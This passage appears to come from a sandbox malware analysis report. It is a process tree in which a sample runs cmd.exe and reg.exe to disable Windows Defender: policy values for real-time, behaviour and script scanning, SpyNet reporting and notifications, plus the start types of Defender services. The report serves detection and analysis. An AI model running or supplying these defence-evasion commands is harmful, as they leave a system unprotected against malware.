- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f
    3⤵
    PID:2968
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f"
  2⤵
  PID:2728
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f
    3⤵
    PID:5796
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f"
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f
    3⤵
    PID:5764
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
  2⤵
  PID:2980
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
    3⤵
    PID:5924
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
  2⤵
  PID:3044
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
    3⤵
    PID:4328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f"
  2⤵
  PID:864
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f
    3⤵
    PID:6140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:2260
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:2328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f"
  2⤵
  PID:4000
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f
    3⤵
    PID:1036
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f"
  2⤵
  PID:3500
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f
    3⤵
    PID:5948
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f"
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f
    3⤵
    PID:5004
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f"
  2⤵
  PID:868
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f
    3⤵
    PID:6068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f"
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f
    3⤵
    PID:5756
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:2088
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f
    3⤵
    PID:5876
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4012
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f
    3⤵
    PID:3208
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f"
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f
    3⤵
    PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f"
  2⤵
  PID:3924
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f
    3⤵
    PID:4212
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f"
  2⤵
  PID:2352
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
    3⤵
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f"
  2⤵
  PID:4248
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f
    3⤵
    PID:5836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f"
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f
    3⤵
    PID:6084
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f"
  2⤵
  PID:4292
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f
    3⤵
    PID:6060
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f"
  2⤵
  PID:4300
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f
    3⤵
    PID:4344
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f"
  2⤵
  PID:4308
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f
    3⤵
    PID:5996
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f"
  2⤵
  PID:4380
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f
    3⤵
    PID:5916
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f"
  2⤵
  PID:4400
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f
    3⤵
    PID:6108
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f"
  2⤵
  PID:4408
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f
    3⤵
    PID:1756
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f"
  2⤵
  PID:4428
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f
    3⤵
    PID:2412
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f"
  2⤵
  PID:4444
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f
    3⤵
    PID:2256
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f"
  2⤵
  PID:4460
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f
    3⤵
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f"
  2⤵
  PID:4468
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f
    3⤵
    PID:4132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f"
  2⤵
  PID:4476
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f
    3⤵
    PID:3516
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f"
  2⤵
  PID:4484
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f
    3⤵
    PID:3028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f"
  2⤵
  PID:4524
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f
    3⤵
    PID:2480
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f"
  2⤵
  PID:4532
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f
    3⤵
    PID:3760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f"
  2⤵
  PID:4552
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f
    3⤵
    PID:3444
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f"
  2⤵
  PID:4572
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f
    3⤵
    PID:4164
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:4580
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f
    3⤵
    PID:6124
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f"
  2⤵
  PID:4588
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f
    3⤵
    PID:2376
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f"
  2⤵
  PID:4596
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f
    3⤵
    PID:800
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f"
  2⤵
  PID:4612
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4040
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f"
  2⤵
  PID:4628
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f
    3⤵
    PID:3020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f"
  2⤵
  PID:4644
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f
    3⤵
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f"
  2⤵
  PID:4656
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f
    3⤵
    PID:4276
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f"
  2⤵
  PID:4664
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f
    3⤵
    PID:3204
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f"
  2⤵
  PID:4688
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f
    3⤵
    PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f"
  2⤵
  PID:4704
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f
    3⤵
    PID:2724
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f"
  2⤵
  PID:4712
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /f
    3⤵
    PID:4440
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f"
  2⤵
  PID:4720
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /f
    3⤵
    PID:1236
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f"
  2⤵
  PID:4728
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /f
    3⤵
    PID:3636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f"
  2⤵
  PID:4752
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /f
    3⤵
    PID:5520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:4760
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:2780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4768
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 2 /f
    3⤵
    - Modifies security service
    - Modifies registry key
    PID:3384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:4816
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:3716
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:4912
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    PID:2312
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:2888
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 0 /f
    3⤵
    PID:2624
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:4204
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:1324
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 3 /f
    3⤵
    PID:2072
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
  2⤵
  PID:3408
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 3 /f
    3⤵
    - Modifies Security services
    - Modifies registry key
    PID:2508
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:3708
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    PID:3484
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
  2⤵
  PID:2264
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 1 /f
    3⤵
    PID:1620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:3956
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    PID:4548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %%windir%%\system32\SecurityHealthSystray.exe /f
  2⤵
  PID:4020
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /t REG_EXPAND_SZ /d %C:\Windows%\system32\SecurityHealthSystray.exe /f
    3⤵
    - Adds Run key to start application
    PID:3868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SYSTEMROOT%\System32\OneDriveSetup.exe
  2⤵
  PID:5528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c %SystemRoot%\SysWOW64\OneDriveSetup.exe
  2⤵
  PID:3460
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f"
  2⤵
  PID:2948
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3772
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender notification settings
    PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:1676
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:4396
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
  2⤵
  PID:3168
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
    3⤵
    PID:1764
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f"
  2⤵
  PID:4424
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /t REG_DWORD /d 0 /f
    3⤵
    PID:6000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f"
  2⤵
  PID:4436
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /t REG_DWORD /d 1 /f
    3⤵
    PID:4240
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT / v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
  2⤵
  PID:5516
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /t REG_DWORD /d 1 /f
  2⤵
  PID:3480
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f"
  2⤵
  PID:4880
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v HideSystray /t REG_DWORD /d 1 /f
    3⤵
    PID:2512
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
  2⤵
  PID:5592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f"
  2⤵
  PID:5600
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:6016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /t REG_DWORD /d 0 /f"
  2⤵
  PID:2704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f"
  2⤵
  PID:3352
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /t REG_DWORD /d 1 /f
    3⤵
    PID:4788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f"
  2⤵
  PID:3704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:5688
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /t REG_DWORD /d 0 /f
    3⤵
    PID:3336
- C:\Windows\SysWOW64\cmd.exe
